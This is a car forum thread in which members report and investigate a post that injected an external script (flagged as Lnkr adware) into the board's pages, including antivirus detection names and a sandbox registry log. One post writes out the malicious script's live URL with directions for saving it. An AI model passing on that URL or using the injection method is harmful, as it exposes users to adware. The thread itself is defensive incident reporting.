home register FAQ memberlist calendar

Go Back   Turbobricks Forums > General > website & board

Reply
 
Thread Tools Display Modes
Old 04-15-2021, 09:05 PM   #1
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default Thread is redirecting to virus!

DO NOT CLICK "NWV: 86-93 240 wagon shell." thread in wanted.

It redirects to a malicious webpage. Thank God I have Norton antivirus security that immediately blocked the webpage. No idea what virus it was trying to install but my Norton antivirus detected a "web attack," categorized under High severity. I'm going to not browse the forum until this is fixed
daniels740 is offline   Reply With Quote
Old 04-15-2021, 10:27 PM   #2
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Looks to be fixed. Any info on what this was and if this can occur more frequently? Scared the heck out of me.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 06:18 PM   #3
boostdemon
creative mastermind
 
boostdemon's Avatar
 
Join Date: May 2002
Location: Cary, NC
Default

i suspect its just a false positive on a way the images were hotlinked? Not sure but theres really no way to redirect a thread link to a website.
__________________
"the best way to get the right answer on the internet is not to ask a question; it's to post the wrong answer."

1983 242 TIC Flathood
1986 745 GLE
1988 Toyota Pickup 4x4
2001 V70 T5
2001 V70 XC
2004 V70 R Flash Green
2004 V70 R Grey

"Flathood" Owners | Motorcyclists | Guitarists
boostdemon is offline   Reply With Quote
Old 04-16-2021, 06:30 PM   #4
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I dunno, but I at first ignored the "known malicious website" warning and proceeded, only for Norton to detect large suspicious traffic outgoing, and multiple web attacks following proceeding to wherever the link was taking me. It induced a bit of a panic.

The link it was redirecting to can be seen with a couple other details from Norton.


I have fairly fast internet, so it could be that it was taking me to the actual thread first but redirecting really fast. It seemed instant to me.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 07:17 PM   #5
John242Ti
LH-Jet & Carb Free Zone
 
John242Ti's Avatar
 
Join Date: May 2003
Location: Duvall, WA
Default

I wonder if maybe you have malware on your PC somewhere. I've clicked the thread multiple times with no problems. Granted, I'm running a Mac and am using Firefox. So, if you have the Malwarebytes app on your computer, run a full scan and make sure that the hard drive is clean. Also, if you're running Microsoft Edge, I'd use Firefox instead.
__________________

1982 242Ti - black, M46. 1985 245Ti - blue, M46 - soon to be for sale.

@john242ti on IG
John242Ti is offline   Reply With Quote
Old 04-16-2021, 07:24 PM   #6
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by John242Ti View Post
I wonder if maybe you have malware on your PC somewhere. I've clicked the thread multiple times with no problems. Granted, I'm running a Mac and am using Firefox. So, if you have the Malwarebytes app on your computer, run a full scan and make sure that the hard drive is clean. Also, if you're running Microsoft Edge, I'd use Firefox instead.
The link was fixed when JohnMc edited the post at 9:23pm yesterday and I've been able to view it with no issue since. I also completed all sorts of scans to be on the safe side yesterday and had no problem. The antivirus I pay for did its job. Maybe JohnMc can let us in on some details of what he fixed.
daniels740 is offline   Reply With Quote
Old 04-16-2021, 07:33 PM   #7
JohnMc
PV Abuser
 
JohnMc's Avatar
 
Join Date: May 2004
Location: St. Louis
Default

There was some javascript link in script tags - the 'nicoletto.com' shown in in the screen shots above. I took that out. Not sure what it was supposed to be doing. I removed it.
__________________
'63 PV Rat Rod
'93 245 16VT Classic #1141
JohnMc is offline   Reply With Quote
Old 04-16-2021, 08:51 PM   #8
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I just hope nobody got a virus. When I proceeded to the webpage, it appeared to redirect me to a webpage that just wasn't available, no visible download or anything. If Norton hadn't detected and stopped the web attack, as well as informed me of suspicious outbound traffic, I would not have had a single clue that something was up.

I'd just advise that everyone get a good antivirus on their computer. It was apparent that this thing was trying to spread like wildfire to the other devices on my network, had Norton not blocked the outbound traffic.

Stay safe, guys.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 06:57 PM   #9
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

They've done it again. I wouldn't try to take a look at what's happening unless you have an antivirus you really trust.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:16 PM   #10
2manyturbos
Moderator
 
Join Date: Mar 2003
Location: Monroe, OR USA
Default

I got the same warning with my Norton Antivirus software when I posted to the thread. I just deleted the thread. The OP can try again if he/she is legit.
2manyturbos is offline   Reply With Quote
Old 04-19-2021, 07:18 PM   #11
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

I have done some problem solving and figured out what is happening. YOU GUYS ARE NOT SAFE!!!

Either OP is himself infected with a virus or he is trying to infect board members.

To stop the redirecting, I blocked javascript in google for TB. That allowed me to visit the forum, to see that OP's latest post has a bit of javascript at the bottom that redirects to the malicious website.

I wanted to see if Firefox automatically blocks it, but NO, IT WILL ALLOW THE INTRUSION ATTEMPT.

More in detail, I visited the thread on Firefox, and it looked completely safe, only for Norton to need to block the intrusion attempt. Had Norton Antivirus not done this for me, I would have had no idea of the intrusion attempt when I used Firefox. It looked like I just visited the thread like normal.

I HIGHLY advise that we temporarily or perma-ban the OP.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:19 PM   #12
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by 2manyturbos View Post
I got the same warning with my Norton Antivirus software when I posted to the thread. I just deleted the thread. The OP can try again if he/she is legit.
I was just about to PM you cause I saw you responded to the thread while it was redirecting. I am certain there are a couple of people on here who are infected with the virus and have no idea.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 07:52 PM   #13
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

To recap, there is a period of time when clicking on the thread (even if it appeared to load normally) allowed a web attack onto the user's computer, if they had JavaScript enabled and do not use a good antivirus.

SO, IF YOU VISITED THE THREAD "NWV: 86-93 240 wagon shell" in wanted:

FROM Original post time on 4/15/2021 TO Time edited ~9:25PM EST 4/15/2021
OR
FROM Second post by OP at ~5PM EST 4/19/2021 TO Time the thread was deleted 4/19/2021,

and nothing seemed out of the usual on your PC that has no antivirus, you likely have malware running on your PC. I have no idea what this web attack would have done to mobile devices, Macs, etc.

I cannot stress this enough, I advise that everyone has a good antivirus. It is worth the price.

Last edited by daniels740; 04-19-2021 at 08:21 PM..
daniels740 is offline   Reply With Quote
Old 04-19-2021, 09:57 PM   #14
MasterBlaster
Board Member
 
MasterBlaster's Avatar
 
Join Date: Feb 2009
Location: Port Coquitlam
Default

Running Puppy Linux with Chromium, so of course I clicked on it, got the source, and downloaded the referenced Javascript file from nickletto.com.

Just for fun, I gave the .JS file to Virustotal.com to look at.
Copied most of the results here:


Ad-Aware - JS:Adware.Lnkr.E
AegisLab - Adware.Script.Generic.2!c
Arcabit - JS:Adware.Lnkr.E
Avast - Script:SNH-gen [Adw]
AVG - Script:SNH-gen [Adw]
BitDefender - JS:Adware.Lnkr.E
Comodo - Application.JS.AdWare.Revizer.E@8bp9s7
Cyren - JS/Revizer.A
DrWeb - JS.Siggen5.40409
Emsisoft - JS:Adware.Lnkr.E (B)
eScan - JS:Adware.Lnkr.E
FireEye - JS:Adware.Lnkr.E
GData - Script.Adware.Injector.OC
Kaspersky - Not-a-virus:HEUR:AdWare.Script.Generic
MAX - Malware (ai Score=64)
NANO-Antivirus - Trojan.Script.Adware.iestfp
Rising - Adware.Lnkr/JS!1.D2D0 (CLASSIC)
ZoneAlarm by Check Point - Not-a-virus:HEUR:AdWare.Script.Generic

-------------------------------------

When executing the file being studied, it performed the following actions on the registry of the sandbox environment.

Registry Actions

Registry Keys Set

HKLM\Software\Microsoft\WBEM\CIMOM\ConfigValueEssN eedsLoading
1

HKLM\Software\Microsoft\WBEM\CIMOM\List of event-active namespaces
00 00 54 00 45 00 76 00 65 00 6E 00 74 00 4C 00 6F 00 67 00 45 00 76 00 65 00 6E 00 74 00 43 00 6F 00 6E 00 73 00 75 00 6D 00 65 00 72 00
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Greenland Standard Time\TZI

HKLM\SYSTEM\ControlSet001\Control\TimeZoneInformat ion\ActiveTimeBias
4294967176
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Iran Standard Time\TZI

HKLM\SYSTEM\ControlSet001\Control\BackupRestore\Fi lesNotToBackup\BITS_LOG
%windir%\System32\Bits.log

HKLM\SYSTEM\ControlSet001\Control\BackupRestore\Fi lesNotToBackup\BITS_BAK
%windir%\System32\Bits.bak

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\BIT S\StateIndex
1

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance \Performance Refresh
0

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance \Performance Refreshed
1

HKLM\SOFTWARE\Microsoft\WBEM\PROVIDERS\Performance \Performance Data
28 1B 00 00 01 00 00 00 00 00 00 00 10 00 00 00 18 1B 00 00 09 00 00 00 9A 00 00 00 01 00 00 00 01 00 00 00 40 00 00 00 1A 00 00 00 5C 00 5C 00 2E 00 5C 00 72 00 6F 00 6F 00 74 00 5C 00 77 00 6D 00 69 00 00 00 00 00 00 00 00 00 00 00 00 00 C0 01 00 00 04 00 00 00 08 00 00 00 01 00 00 00 00 00 00 00 01 00 00 00 64 00 00 00 68 00 00 00 3A 00 00 00 4D 00 53 00 69 00 53 00 43 00 53 00 49 00 5F 00 43 00 6F 00 6E 00 6E 00 65 00 63 00 74 00 69 00 6F 00 6E 00 53 00 74 00 61 00 74 00 69 00 73 00 74 00 69 00 63 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 1A 00 00 00 49 00 6E 00 73 00 74 00 61 00 6E 00 63 00 65 00 4E 00 61 00 6D 00 65 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 00 00 00 00 00 00 00 02 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 48 00 00 00 1C 00 00 00 42 00 79 00 74 00 65 00 73 00 52 00 65 00 63 00 65 00 69 00 76 00 65 00 64 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 04 00 00 00 15 00 00 00 00 00 00 00 64 00 00 00 00 05 41 10 40 00 00 00 14 00 00 00 42 0

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Counter
12642

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Last Help
12643

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib\Updating
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Paraguay Standard Time\TZI

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\ndis.sys[MofResourceName]
LowDateTime:-1971493113,HighDateTime:30676308***Binary mof failed, see WMIPROV.LOG

HKLM\Software\Microsoft\WBEM\WDM\%windir%\System32 \Drivers\portcls.SYS[PortclsMof]
LowDateTime:-1221632304,HighDateTime:30487028***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\en-US\ACPI.sys.mui[ACPIMOFResource]
LowDateTime:-403062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \DRIVERS\HDAudBus.sys[HDAudioMofName]
LowDateTime:-1867536076,HighDateTime:30116016***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\System32 \Drivers\en-US\portcls.SYS.mui[PortclsMof]
LowDateTime:-503062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \advapi32.dll[MofResourceName]
LowDateTime:-1337772912,HighDateTime:30778796***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \en-US\advapi32.dll.mui[MofResourceName]
LowDateTime:-1270310445,HighDateTime:30778796***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\en-US\mssmbios.sys.mui[MofResource]
LowDateTime:-143062016,HighDateTime:30016570***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \DRIVERS\en-US\HDAudBus.sys.mui[HDAudioMofName]
LowDateTime:-2018029312,HighDateTime:30016571***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\en-US\ndis.sys.mui[MofResourceName]
LowDateTime:-1258029312,HighDateTime:30016571***Binary mof failed, see WMIPROV.LOG

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \DRIVERS\en-US\intelppm.sys.mui[PROCESSORWMI]
LowDateTime:2076937984,HighDateTime:30016571***Bin ary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\IDE\DiskAMDX_HARD DISK___________________________2.5+____\5&2770a7af&0&0.0.0_0-{05901221-D566-11d1-B2F0-00A0C9062910}
LowDateTime:803713417,HighDateTime:0***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \DRIVERS\intelppm.sys[PROCESSORWMI]
LowDateTime:-2085707242,HighDateTime:30778791***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\ACPI.sys[ACPIMOFResource]
LowDateTime:-1241494372,HighDateTime:30646958***Binary mof compiled successfully

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \DRIVERS\monitor.sys[MonitorWMI]

HKLM\Software\Microsoft\WBEM\WDM\%windir%\system32 \drivers\mssmbios.sys[MofResource]
LowDateTime:2004871927,HighDateTime:30733930***Bin ary mof compiled successfully

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\22\(Default)

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff00
00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff01
00 00 00 00 77 00 00 00 19 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff02
01 00 00 00 5A 00 00 00 D6 17 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Control\Nsi\{eb004a03-9b1a-11d4-9123-0050047759bc}\24\ffffffffffffffffffffffffffffff03
00 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF FF FF FF FF

HKLM\SYSTEM\ControlSet001\Services\BITS\Performanc e\PerfMMFileName
Global\MMF_BITS_s
\\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\Middle East Standard Time\TZI

Registry Keys Deleted

HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Perfor mance\First Counter
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Perfor mance\Last Counter
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Perfor mance\First Help
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Perfor mance\Last Help
HKLM\SYSTEM\ControlSet001\Services\WmiApRpl\Perfor mance\Object List

Process And Service Actions

Processes Terminated

wmiadap.exe /F /T /R

Processes Tree

2992 - wmiadap.exe /F /T /R
2676 - wscript.exe %SAMPLEPATH%
3040 - %windir%\system32\wbem\wmiprvse.exe
__________________




1990 740GL
517,000 km so far...
MasterBlaster is offline   Reply With Quote
Old 04-19-2021, 10:13 PM   #15
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Although I'm not technologically-literate enough to understand the full extent of the previous post, I wanted to know how you were able to find the nickletto file after the thread was deleted. Did you copy the link seen in my screenshots?

I wanted to know because I was looking into how the OP was redirecting the thread the way they were.

From research, I found out they can use a couple JavaScript codes that I will not be sharing to redirect to a different webpage. Although those codes worked using youtube.com as the new page in some testing I completed, I was not able to match the speed at which the poster with the actual virus was able to complete.

Therefore, I'd like to know if you can still view their original post because, in that case, I would like to see it too, to see the JavaScript code they were using in their post.
daniels740 is offline   Reply With Quote
Old 04-19-2021, 10:28 PM   #16
boostdemon
creative mastermind
 
boostdemon's Avatar
 
Join Date: May 2002
Location: Cary, NC
Default

Quote:
Originally Posted by MasterBlaster View Post
Running Puppy Linux with Chromium, so of course I clicked on it, got the source, and downloaded the referenced Javascript file from nickletto.com.

Wow, good info, thanks!

If someone could tell me WHO the person is, i'll take care of it.

Last edited by boostdemon; 04-19-2021 at 10:34 PM..
boostdemon is offline   Reply With Quote
Old 04-20-2021, 01:04 AM   #17
MasterBlaster
Board Member
 
MasterBlaster's Avatar
 
Join Date: Feb 2009
Location: Port Coquitlam
Default

Quote:
Originally Posted by daniels740 View Post
I wanted to know how you were able to find the nickletto file after the thread was deleted.
I didn't. I saw you say "They've done it again." and off I went.

Opened the thread, viewed the source (Ctrl+U), found the nickletto link, and did a "Save link as..." to bring it on down.

Quote:
Originally Posted by daniels740 View Post
Therefore, I'd like to know if you can still view their original post because, in that case, I would like to see it too, to see the JavaScript code they were using in their post.
Can't see the post any more, as it's now an "Invalid link".
But here's a pretty little ZIP file with the post's source, as well as the JS file...

(Stay tuned... trying to get Google Drive to cooperate).

Screw it. Google sucks.
This is the link:
[code]www.nickletto.com/2305aeaa4cd4bdad02.js[/code]
Right click, save the link as... whatever. 189Kb
No idea what happens if you directly click on in, so don't.

You can also easily find the link in the source file... just search for "nick".
It's just a single line injected at the end of the OP's reply.

Here's a nice safe picture of the line with the link:



Might know why I couldn't link the ZIP. Google Drive had it "Flagged for abuse". Maybe they're mad at me now.

Last edited by boostdemon; 04-24-2021 at 01:47 AM..
MasterBlaster is offline   Reply With Quote
Old 04-20-2021, 08:36 AM   #18
daniels740
Board Member
 
Join Date: May 2019
Location: South Florida
Default

Quote:
Originally Posted by MasterBlaster View Post
I didn't. I saw you say "They've done it again." and off I went...
That screenshot is exactly what I was looking for, thanks! Looks to me like they were able to redirect so quickly because they weren't redirecting to an external website that executed the file, they were executing the external JavaScript file itself.

Either way, I wanted to know if we can somehow disable external JavaScript files or commands to stop board members from doing things like this. I, myself, who never wrote a JavaScript command heretofore, was able to figure out how to redirect a thread immediately upon loading using JavaScript in a reply to a thread.

I'm sure you can see why this is a problem, so I'm thinking about if there's something we can do to stop misuse of JavaScript in the forums.
daniels740 is offline   Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is On

Forum Jump


All times are GMT -4. The time now is 11:53 AM.

Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2021, vBulletin Solutions Inc.